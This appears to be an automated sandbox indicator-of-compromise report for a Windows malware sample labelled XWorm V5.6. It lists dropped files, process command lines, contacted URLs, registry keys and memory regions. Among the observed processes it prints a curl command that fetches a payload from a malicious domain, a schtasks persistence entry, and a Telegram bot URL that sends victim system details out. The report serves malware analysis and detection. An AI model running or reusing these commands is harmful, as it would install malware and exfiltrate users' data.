IOC Report
18sFhgSyVK.exe

loading gif

Files

File Path
Type
Category
Malicious
18sFhgSyVK.exe
PE32+ executable (console) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Windows\StartMenuExperienceHost.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:03:11 2024, mtime=Sat Nov 23 19:03:12 2024, atime=Sat Nov 23 19:03:11 2024, length=79872, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\18sFhgSyVK.exe
"C:\Users\user\Desktop\18sFhgSyVK.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c color b
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
malicious
C:\Windows\StartMenuExperienceHost.exe
C:\Windows\StartMenuExperienceHost.exe
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
C:\Users\user~1\AppData\Local\Temp\svchost.exe
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
C:\Users\user~1\AppData\Local\Temp\svchost.exe
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
C:\Users\user~1\AppData\Local\Temp\svchost.exe
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
C:\Users\user~1\AppData\Local\Temp\svchost.exe
malicious
C:\Users\user\AppData\Local\Temp\svchost.exe
C:\Users\user~1\AppData\Local\Temp\svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 13 hidden processes, click here to show them.

URLs

Name
IP
Malicious
104.198.168.179
malicious
https://r2.hypixel.cfd/svchost.exe
172.66.0.158
malicious
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
unknown
https://api.telegram.org/bot
unknown
https://dev.ditu.live.com/REST/v1/Routes/
unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
unknown
https://r2.hypixel.cfd/svchost.exe(
unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/
unknown
https://dev.virtualearth.net/REST/v1/Routes/
unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
unknown
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
unknown
https://dev.virtualearth.net/REST/v1/Locations
unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx
unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx
unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
unknown
https://dynamic.t
unknown
https://r2.hypixel.cfd/svchost.exe-oC:
unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit
unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.bingmapsportal.com
unknown
https://dev.ditu.live.com/REST/v1/Locations
unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
149.154.167.220
127.0.0.1
http://ip-api.com/line/?fields=hosting
208.95.112.1
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
r2.hypixel.cfd
172.66.0.158
malicious
ip-api.com
208.95.112.1
api.telegram.org
149.154.167.220
time.windows.com
unknown

IPs

IP
Domain
Country
Malicious
172.66.0.158
r2.hypixel.cfd
United States
malicious
127.0.0.1
unknown
unknown
malicious
208.95.112.1
ip-api.com
United States
149.154.167.220
api.telegram.org
United Kingdom
104.198.168.179
unknown
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
STATE
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
cval
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
svchost
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
LastKnownGoodTime
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
B32000
unkown
page readonly
malicious
2E89000
trusted library allocation
page read and write
malicious
2E21000
trusted library allocation
page read and write
malicious
16CB93A4000
heap
page read and write
4CC7DDF000
unkown
page read and write
1298000
heap
page read and write
135A5420000
heap
page read and write
319E000
stack
page read and write
FF0000
heap
page read and write
1302000
heap
page read and write
3010000
trusted library allocation
page read and write
13201000
trusted library allocation
page read and write
1200000
heap
page read and write
30F0000
heap
page execute and read and write
135A5670000
heap
page read and write
135A5675000
heap
page read and write
F3A5DFE000
unkown
page readonly
7FFAAC440000
trusted library allocation
page execute and read and write
7FFAAC294000
trusted library allocation
page read and write
1102000
heap
page read and write
7FFAAC2B4000
trusted library allocation
page read and write
1A98DD30000
heap
page read and write
2066BFE000
stack
page read and write
1120000
heap
page read and write
1BCFE000
stack
page read and write
16CB93E1000
heap
page read and write
F3A5CFE000
stack
page read and write
FFE000
stack
page read and write
FE0000
heap
page read and write
1BD28000
heap
page read and write
12A5000
heap
page read and write
2AA1000
trusted library allocation
page read and write
2117C261000
heap
page read and write
1100000
heap
page read and write
BD0000
heap
page read and write
16CB93DE000
heap
page read and write
7FF77C927000
unkown
page read and write
13452FF000
stack
page read and write
1BEFE000
stack
page read and write
C3B000
heap
page read and write
BD4497E000
unkown
page readonly
7FFAAC440000
trusted library allocation
page read and write
1C42B000
stack
page read and write
1221000
heap
page read and write
7FF77C911000
unkown
page execute read
1610000
heap
page read and write
12AA8000
trusted library allocation
page read and write
7FFAAC452000
trusted library allocation
page read and write
16CB9427000
heap
page read and write
7FFAAC2A3000
trusted library allocation
page execute and read and write
D70000
unkown
page readonly
1244000
heap
page read and write
21EDC313000
heap
page read and write
2066AFF000
stack
page read and write
25157D00000
heap
page read and write
30B0000
trusted library allocation
page read and write
1580000
heap
page execute and read and write
135A5659000
heap
page read and write
1BAFE000
stack
page read and write
1BEFE000
stack
page read and write
1BA02000
heap
page read and write
C13000
heap
page read and write
2AA1000
trusted library allocation
page read and write
2B128E64000
heap
page read and write
313F000
stack
page read and write
CC6000
heap
page read and write
1200000
heap
page read and write
7FFB167B5000
unkown
page readonly
7FFAAC360000
trusted library allocation
page execute and read and write
B80000
trusted library allocation
page read and write
7FFAAC3D0000
trusted library allocation
page execute and read and write
7FFAAC2C4000
trusted library allocation
page read and write
12A0000
heap
page read and write
1C02E000
stack
page read and write
287AB7E000
unkown
page readonly
255EE020000
heap
page read and write
2B128E02000
heap
page read and write
2117C1E0000
trusted library allocation
page read and write
131A1000
trusted library allocation
page read and write
12AA3000
trusted library allocation
page read and write
21EDC240000
heap
page read and write
7FFB167B2000
unkown
page readonly
31A1000
trusted library allocation
page read and write
1A98DDC5000
heap
page read and write
2B128E00000
heap
page read and write
1200000
heap
page read and write
2117C251000
heap
page read and write
BD4517E000
unkown
page readonly
135A5686000
heap
page read and write
BD456FE000
stack
page read and write
1BCEE000
stack
page read and write
1510000
heap
page read and write
1241000
heap
page read and write
89EA87E000
stack
page read and write
13203000
trusted library allocation
page read and write
BE0000
heap
page read and write
2117C22B000
heap
page read and write
10A8000
heap
page read and write
2BB3000
heap
page read and write
16CB9350000
remote allocation
page read and write
FF0000
heap
page read and write
7FF77C927000
unkown
page write copy
121F000
heap
page read and write
25157E37000
heap
page read and write
7FFAAC370000
trusted library allocation
page execute and read and write
7FFAAC2C1000
trusted library allocation
page read and write
135A5600000
heap
page read and write
7FFAAC2CD000
trusted library allocation
page execute and read and write
135A5662000
heap
page read and write
1302000
heap
page read and write
123E000
heap
page read and write
7FFAAC460000
trusted library allocation
page read and write
C13000
heap
page read and write
150F000
stack
page read and write
7FF77C928000
unkown
page readonly
1024000
heap
page read and write
21EDC22B000
heap
page read and write
21EDC202000
heap
page read and write
314D000
trusted library allocation
page read and write
2AA5000
trusted library allocation
page read and write
BD4557D000
stack
page read and write
1BA02000
heap
page read and write
CB5000
heap
page read and write
C3D000
heap
page read and write
25157E6E000
heap
page read and write
7FFAAC29D000
trusted library allocation
page execute and read and write
7FFB167A6000
unkown
page readonly
7FFAAC432000
trusted library allocation
page read and write
2FAF000
trusted library allocation
page read and write
7FFAAC31C000
trusted library allocation
page execute and read and write
F70000
heap
page execute and read and write
3030000
heap
page execute and read and write
1540000
heap
page execute and read and write
1270000
trusted library allocation
page read and write
1236000
heap
page read and write
1A98DD50000
heap
page read and write
C75000
heap
page read and write
AF1000
stack
page read and write
1B9C0000
heap
page read and write
C3A000
heap
page read and write
2B128C90000
heap
page read and write
7FFAAC366000
trusted library allocation
page execute and read and write
BD4587E000
stack
page read and write
BD44D7D000
stack
page read and write
12AB000
heap
page read and write
10C4000
heap
page read and write
1BDFE000
stack
page read and write
2B128E13000
heap
page read and write
1C7FF000
stack
page read and write
2117C1B0000
heap
page read and write
16CB9390000
heap
page read and write
21EDC300000
heap
page read and write
2117C24C000
heap
page read and write
2117C860000
remote allocation
page read and write
10C6000
heap
page read and write
7FFAAC3A6000
trusted library allocation
page execute and read and write
7FFAAC30C000
trusted library allocation
page execute and read and write
11F0000
heap
page read and write
7FFAAC2BB000
trusted library allocation
page execute and read and write
7FFAAC2AD000
trusted library allocation
page execute and read and write
255EE0EC000
heap
page read and write
320D000
trusted library allocation
page read and write
122C000
heap
page read and write
7FFAAC2B3000
trusted library allocation
page execute and read and write
7FFAAC2C4000
trusted library allocation
page read and write
BD450FD000
stack
page read and write
1258000
heap
page read and write
1102000
heap
page read and write
F30000
trusted library allocation
page read and write
13AC000
stack
page read and write
7FFAAC386000
trusted library allocation
page execute and read and write
7FFAAC460000
trusted library allocation
page read and write
16CB93F3000
heap
page read and write
CB3000
heap
page read and write
1BDFE000
stack
page read and write
1BCFE000
stack
page read and write
2B129600000
heap
page read and write
12AA1000
trusted library allocation
page read and write
2B128E7C000
heap
page read and write
16CB940D000
heap
page read and write
206673C000
stack
page read and write
1BBFF000
stack
page read and write
4CC7D59000
stack
page read and write
135A5702000
heap
page read and write
1502000
heap
page read and write
16CB93E1000
heap
page read and write
2117C261000
heap
page read and write
BD4567E000
unkown
page readonly
1B802000
heap
page read and write
1A98DDF0000
heap
page read and write
1B1A6000
heap
page read and write
1C6FE000
stack
page read and write
287A6FE000
stack
page read and write
1C602000
heap
page read and write
7FFAAC28D000
trusted library allocation
page execute and read and write
135A5660000
heap
page read and write
1120000
heap
page read and write
122C000
heap
page read and write
1580000
heap
page read and write
1CA96000
heap
page read and write
131A3000
trusted library allocation
page read and write
1BBED000
stack
page read and write
1AF1D000
stack
page read and write
31B1000
trusted library allocation
page read and write
1702000
heap
page read and write
1702000
heap
page read and write
7FFAAC450000
trusted library allocation
page execute and read and write
7FFAAC2A3000
trusted library allocation
page read and write
135A56A8000
heap
page read and write
21EDC4E0000
heap
page read and write
FD0000
heap
page read and write
1C32E000
stack
page read and write
F20000
heap
page read and write
BB0000
heap
page read and write
C36000
heap
page read and write
12AF000
heap
page read and write
BD44E7E000
unkown
page readonly
C50000
heap
page read and write
BE0000
heap
page read and write
105D000
heap
page read and write
135A565C000
heap
page read and write
7FFAAC2BD000
trusted library allocation
page execute and read and write
25157E13000
heap
page read and write
1BCFE000
stack
page read and write
2C20000
heap
page read and write
16FE000
stack
page read and write
7FFAAC380000
trusted library allocation
page execute and read and write
1BD0A000
heap
page read and write
15CE000
stack
page read and write
1224000
heap
page read and write
7FF77C911000
unkown
page execute read
DF0000
heap
page read and write
12BC000
heap
page read and write
1400000
heap
page read and write
287B17E000
unkown
page readonly
135A564A000
heap
page read and write
1A98DD20000
heap
page read and write
21EDC302000
heap
page read and write
BD448FD000
stack
page read and write
2A9E000
stack
page read and write
7FF46FC70000
trusted library allocation
page execute and read and write
FF0000
heap
page read and write
1302000
heap
page read and write
135A565B000
heap
page read and write
255EE0E0000
heap
page read and write
131A3000
trusted library allocation
page read and write
2117CA02000
trusted library allocation
page read and write
1030000
heap
page read and write
F60000
heap
page read and write
287AC7E000
stack
page read and write
287AE7E000
stack
page read and write
31AF000
trusted library allocation
page read and write
31AD000
trusted library allocation
page read and write
21EDC26C000
heap
page read and write
10AA000
heap
page read and write
7FFAAC2E0000
trusted library allocation
page read and write
31AF000
trusted library allocation
page read and write
287AF7E000
unkown
page readonly
13453FF000
stack
page read and write
16CB93A7000
heap
page read and write
7FFAAC346000
trusted library allocation
page read and write
135A5650000
heap
page read and write
31AD000
trusted library allocation
page read and write
16CB93AE000
heap
page read and write
1C12C000
stack
page read and write
7FF77C928000
unkown
page readonly
2AAD000
trusted library allocation
page read and write
2E10000
heap
page execute and read and write
1702000
heap
page read and write
F40000
heap
page read and write
7FFB167B0000
unkown
page read and write
25157E53000
heap
page read and write
89EA13B000
stack
page read and write
25157F02000
heap
page read and write
1038000
heap
page read and write
1062000
heap
page read and write
3141000
trusted library allocation
page read and write
7FFAAC2DD000
trusted library allocation
page execute and read and write
B20000
heap
page read and write
135A565F000
heap
page read and write
7FFAAC442000
trusted library allocation
page read and write
C37000
heap
page read and write
1B8EA000
stack
page read and write
21EDC200000
heap
page read and write
135A568B000
heap
page read and write
150F000
stack
page read and write
1BEFE000
stack
page read and write
1344F3C000
stack
page read and write
2117C0D0000
heap
page read and write
7FFAAC396000
trusted library allocation
page execute and read and write
2DE0000
heap
page read and write
BD4577E000
unkown
page readonly
16CB9350000
remote allocation
page read and write
7FFAAC30C000
trusted library allocation
page execute and read and write
13143000
trusted library allocation
page read and write
C4F000
heap
page read and write
25157E5E000
heap
page read and write
7FFAAC430000
trusted library allocation
page read and write
7FFAAC2B3000
trusted library allocation
page execute and read and write
13208000
trusted library allocation
page read and write
309F000
stack
page read and write
1221000
heap
page read and write
7FFAAC2BD000
trusted library allocation
page execute and read and write
21EDDCD0000
trusted library allocation
page read and write
1BA02000
heap
page read and write
21EDDD10000
remote allocation
page read and write
2AAF000
trusted library allocation
page read and write
DD0000
heap
page read and write
1C8FF000
stack
page read and write
25157E16000
heap
page read and write
D02000
heap
page read and write
10F1000
stack
page read and write
2117C24B000
heap
page read and write
7FFAAC3E0000
trusted library allocation
page execute and read and write
1570000
trusted library allocation
page read and write
12FA8000
trusted library allocation
page read and write
16CB93DE000
heap
page read and write
7FFAAC2CD000
trusted library allocation
page execute and read and write
2B128DA0000
trusted library allocation
page read and write
2AB1000
trusted library allocation
page read and write
7FFAAC2A4000
trusted library allocation
page read and write
1500000
trusted library allocation
page read and write
287A38B000
stack
page read and write
7FFAAC420000
trusted library allocation
page read and write
1602000
heap
page read and write
7FFAAC2D0000
trusted library allocation
page read and write
1CC90000
heap
page execute and read and write
1BCFE000
stack
page read and write
2117C225000
heap
page read and write
7FFAAC396000
trusted library allocation
page execute and read and write
7FFAAC290000
trusted library allocation
page read and write
160F000
stack
page read and write
16CB93E1000
heap
page read and write
1590000
heap
page execute and read and write
7FFAAC30C000
trusted library allocation
page execute and read and write
1000000
heap
page read and write
1BD89000
heap
page read and write
255EE0F4000
heap
page read and write
287AD7E000
unkown
page readonly
CC0000
heap
page read and write
135A565D000
heap
page read and write
1BFFF000
stack
page read and write
2AB1000
trusted library allocation
page read and write
16CB93DD000
heap
page read and write
DE0000
heap
page read and write
7FFB16790000
unkown
page readonly
2B128F13000
heap
page read and write
7FFAAC34C000
trusted library allocation
page execute and read and write
16CB9350000
remote allocation
page read and write
135A5520000
heap
page read and write
122D000
heap
page read and write
7FFAAC290000
trusted library allocation
page read and write
15A0000
heap
page read and write
15D0000
heap
page read and write
1AF1D000
stack
page read and write
1242000
heap
page read and write
7FFAAC2C1000
trusted library allocation
page read and write
C21000
heap
page read and write
1CA98000
heap
page read and write
F80000
heap
page read and write
135A5641000
heap
page read and write
7FFAAC450000
trusted library allocation
page read and write
7FFAAC340000
trusted library allocation
page execute and read and write
FE0000
heap
page execute and read and write
2B128E89000
heap
page read and write
7FFAAC3B0000
trusted library allocation
page execute and read and write
1CAB7000
heap
page read and write
1555000
heap
page read and write
7FFAAC2AD000
trusted library allocation
page execute and read and write
12AA000
heap
page read and write
1228000
heap
page read and write
2117C202000
heap
page read and write
123B000
heap
page read and write
131A5000
trusted library allocation
page read and write
31B1000
trusted library allocation
page read and write
2117C213000
heap
page read and write
7FFAAC2BD000
trusted library allocation
page execute and read and write
14FF000
stack
page read and write
2E85000
trusted library allocation
page read and write
2117C860000
remote allocation
page read and write
7FFAAC2C3000
trusted library allocation
page execute and read and write
21EDC265000
heap
page read and write
FC0000
trusted library allocation
page read and write
1273000
trusted library allocation
page read and write
1C9FE000
stack
page read and write
287A87E000
unkown
page readonly
7FFAAC2C3000
trusted library allocation
page execute and read and write
7FFAAC2DC000
trusted library allocation
page execute and read and write
135A5647000
heap
page read and write
D02000
heap
page read and write
7FFAAC396000
trusted library allocation
page execute and read and write
2117C0B0000
heap
page read and write
2AA9000
trusted library allocation
page read and write
1902000
heap
page read and write
7FFAAC2A0000
trusted library allocation
page read and write
16CB9426000
heap
page read and write
128D000
heap
page read and write
F3A593B000
stack
page read and write
135A566D000
heap
page read and write
124F000
heap
page read and write
21EDDD10000
remote allocation
page read and write
16CB9230000
heap
page read and write
1C402000
heap
page read and write
1064000
heap
page read and write
21EDC400000
heap
page read and write
7FFAAC422000
trusted library allocation
page read and write
1C53E000
stack
page read and write
B60000
trusted library allocation
page read and write
13141000
trusted library allocation
page read and write
7FFAAC2CD000
trusted library allocation
page execute and read and write
7FFAAC330000
trusted library allocation
page read and write
C23000
heap
page read and write
123D000
heap
page read and write
105F000
heap
page read and write
16CB9426000
heap
page read and write
16CB93E1000
heap
page read and write
A10000
heap
page read and write
1246000
heap
page read and write
255EE0E9000
heap
page read and write
102C000
heap
page read and write
2117C860000
remote allocation
page read and write
1213000
heap
page read and write
1BAEC000
stack
page read and write
7FFAAC2BD000
trusted library allocation
page execute and read and write
BF0000
heap
page read and write
135A566B000
heap
page read and write
16CB93DB000
heap
page read and write
FB0000
heap
page execute and read and write
2A9F000
stack
page read and write
135A5661000
heap
page read and write
1248000
heap
page read and write
2FB1000
trusted library allocation
page read and write
7FFAAC2C4000
trusted library allocation
page read and write
C2B000
heap
page read and write
125C000
heap
page read and write
16CB94F0000
heap
page read and write
7FFAAC29D000
trusted library allocation
page execute and read and write
2AAD000
trusted library allocation
page read and write
1213000
heap
page read and write
2B128E4B000
heap
page read and write
16CB9426000
heap
page read and write
10E5000
heap
page read and write
1245000
heap
page read and write
7FFAAC294000
trusted library allocation
page read and write
EFF000
stack
page read and write
31FE000
stack
page read and write
10BD000
heap
page read and write
287AAFE000
stack
page read and write
1021000
heap
page read and write
1CA90000
heap
page read and write
1B92F000
stack
page read and write
1260000
trusted library allocation
page read and write
7FFAAC2D1000
trusted library allocation
page read and write
C5C000
heap
page read and write
1B7E3000
heap
page execute and read and write
135A5697000
heap
page read and write
1A98DDC0000
heap
page read and write
1C43F000
stack
page read and write
124C000
heap
page read and write
7FF77C910000
unkown
page readonly
1CDAF000
stack
page read and write
1BEFF000
stack
page read and write
31A9000
trusted library allocation
page read and write
3201000
trusted library allocation
page read and write
135A5654000
heap
page read and write
21EDDD10000
remote allocation
page read and write
1BCFE000
stack
page read and write
7FFAAC3C0000
trusted library allocation
page execute and read and write
103C000
heap
page read and write
2B128E2B000
heap
page read and write
BD4547E000
unkown
page readonly
1287000
heap
page read and write
C2C000
heap
page read and write
7D1000
stack
page read and write
7FFAAC2EC000
trusted library allocation
page execute and read and write
21EDDE02000
trusted library allocation
page read and write
16CB93AF000
heap
page read and write
131A1000
trusted library allocation
page read and write
B30000
unkown
page readonly
7FFAAC284000
trusted library allocation
page read and write
16CB93AE000
heap
page read and write
C62000
heap
page read and write
1B930000
heap
page execute and read and write
3020000
heap
page read and write
B00000
heap
page read and write
31A1000
trusted library allocation
page read and write
21EDC213000
heap
page read and write
C58000
heap
page read and write
1602000
heap
page read and write
7FFAAC2C0000
trusted library allocation
page read and write
1100000
heap
page read and write
10F1000
stack
page read and write
25157E02000
heap
page read and write
7FFAAC2D4000
trusted library allocation
page read and write
16CB93CB000
heap
page read and write
2B128C70000
heap
page read and write
25158000000
heap
page read and write
7FFAAC2B0000
trusted library allocation
page read and write
12C3000
heap
page read and write
1C22E000
stack
page read and write
7FFAAC283000
trusted library allocation
page execute and read and write
135A566C000
heap
page read and write
7FFAAC2CD000
trusted library allocation
page execute and read and write
18FE000
stack
page read and write
2117C25C000
heap
page read and write
2B128E60000
heap
page read and write
7FFAAC2B4000
trusted library allocation
page read and write
255EE070000
heap
page read and write
1102000
heap
page read and write
C87000
heap
page read and write
2FA1000
trusted library allocation
page read and write
127B000
heap
page read and write
1CEAA000
stack
page read and write
25158490000
trusted library allocation
page read and write
135A5636000
heap
page read and write
12E21000
trusted library allocation
page read and write
7FF77C910000
unkown
page readonly
1224000
heap
page read and write
1213000
heap
page read and write
BD445AB000
stack
page read and write
1240000
trusted library allocation
page read and write
1C623000
stack
page read and write
1B67D000
stack
page read and write
12FA1000
trusted library allocation
page read and write
89EA67F000
stack
page read and write
1240000
heap
page read and write
89EA97C000
stack
page read and write
25158602000
trusted library allocation
page read and write
135A566E000
heap
page read and write
BA0000
heap
page execute and read and write
1B5BD000
stack
page read and write
16CB9310000
heap
page read and write
135A564D000
heap
page read and write
123A000
heap
page read and write
C00000
heap
page read and write
1302000
heap
page read and write
1BD4C000
heap
page read and write
1002000
heap
page read and write
7FFAAC2FC000
trusted library allocation
page execute and read and write
1C525000
stack
page read and write
2117C302000
heap
page read and write
A41732B000
stack
page read and write
309E000
stack
page read and write
A4178FD000
stack
page read and write
BD4537E000
stack
page read and write
1C8FE000
stack
page read and write
7FFAAC370000
trusted library allocation
page read and write
1276000
heap
page read and write
135A5667000
heap
page read and write
2FAD000
trusted library allocation
page read and write
2066CFE000
stack
page read and write
7FFAAC340000
trusted library allocation
page read and write
F50000
heap
page read and write
1256000
heap
page read and write
1602000
heap
page read and write
7FFAAC350000
trusted library allocation
page read and write
16CB93AE000
heap
page read and write
135A5658000
heap
page read and write
7FFAAC376000
trusted library allocation
page execute and read and write
31A5000
trusted library allocation
page read and write
1236000
heap
page read and write
FA0000
trusted library allocation
page read and write
1BDFE000
stack
page read and write
F50000
trusted library allocation
page read and write
7FFAAC462000
trusted library allocation
page read and write
4CC807F000
stack
page read and write
255EE030000
heap
page read and write
1250000
heap
page read and write
16CB93CA000
heap
page read and write
1221000
heap
page read and write
16CB9398000
heap
page read and write
C98000
heap
page read and write
7FFAAC2C0000
trusted library allocation
page read and write
EF1000
stack
page read and write
1213000
heap
page read and write
7FFAAC3D0000
trusted library allocation
page execute and read and write
1B61D000
stack
page read and write
30E0000
heap
page read and write
1D3AC000
stack
page read and write
1BDFF000
stack
page read and write
7FFAAC360000
trusted library allocation
page read and write
320F000
trusted library allocation
page read and write
1032000
heap
page read and write
1B9F0000
heap
page execute and read and write
12A8000
heap
page read and write
1AE50000
trusted library allocation
page read and write
7FFAAC2C4000
trusted library allocation
page read and write
1402000
heap
page read and write
1550000
heap
page read and write
16CB9330000
heap
page read and write
255EE060000
heap
page read and write
2B128E3B000
heap
page read and write
122C000
heap
page read and write
1B900000
heap
page read and write
12FA3000
trusted library allocation
page read and write
1B7CE000
stack
page read and write
1CAFE000
stack
page read and write
12BF000
heap
page read and write
1A98DDF8000
heap
page read and write
1237000
heap
page read and write
7FFAAC350000
trusted library allocation
page execute and read and write
7FFAAC2D4000
trusted library allocation
page read and write
1251000
heap
page read and write
2AAF000
trusted library allocation
page read and write
FFC000
heap
page read and write
1B61D000
stack
page read and write
12C3000
heap
page read and write
12C7000
heap
page read and write
135A5440000
heap
page read and write
10AF000
heap
page read and write
1002000
heap
page read and write
B46000
unkown
page readonly
17E0000
trusted library allocation
page read and write
1CFA8000
stack
page read and write
7FFAAC3A0000
trusted library allocation
page execute and read and write
16CB93B1000
heap
page read and write
1C9FE000
stack
page read and write
2B128F00000
heap
page read and write
1CADE000
heap
